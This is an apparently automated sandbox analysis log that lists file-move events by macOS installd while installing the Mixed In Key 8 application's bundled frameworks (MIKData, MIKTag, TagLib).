Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_l4vfyl -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDatabase.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_DCZBCe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSmartCollection.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_ik2GyT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongWaveform.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_AgyvcH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKData.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_uNvcyf -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongCollection.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_TkCcI4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataCuePoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_YJcUvY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSong.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_QregNh -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongEnergySegment.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_VxDbO4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataCollection.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_zA4ilG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/MIKDataSongKeySegment.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/.BC.T_gJffvA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/MIKData	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Modules/.BC.T_QCE5LG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Modules/module.modulemap	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_qvsqiH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreAudio.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignature/.BC.T_bhlGta -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/.BC.T_qhmt0Y -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/MIKTag	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lproj/.BC.T_zWi5Y4 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/en.lproj/InfoPlist.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/.BC.T_mNJC46 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_uePoHY -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCustomProperties.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_cZ1qQK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagErrors.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_xnUU2w -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTag.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_bGJjrz -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagWAV.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_PvNSzN -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorCuePoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_PI5ycv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagUtil.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_rxlUPG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxCuePoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_4PeKLG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagHeader.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_pxF21X -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCopying.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_0nQV8f -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagComment.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_Db6Mld -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagMP4.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_XwDZAP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxDatabase.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_omhIP8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorTrack.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_8RzSUX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagCuePoint.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_0xZv2r -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagID3.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_QltrtV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxTrack.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_IFohl1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorPlaylist.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_WgbOrP -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagFLAC.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_1nyrNU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTagAIFF.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_kgTgNM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKRekordboxQueue.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_FO3DQw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorDatabase.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/.BC.T_xdO1HF -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Headers/MIKTraktorQueue.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignature/.BC.T_HQS0aj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/.BC.T_mx7dic -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/TagLib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_mlgisU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/config.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/.BC.T_kMetts -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/PrivateHeaders/riffutils.h	Jump to behavior
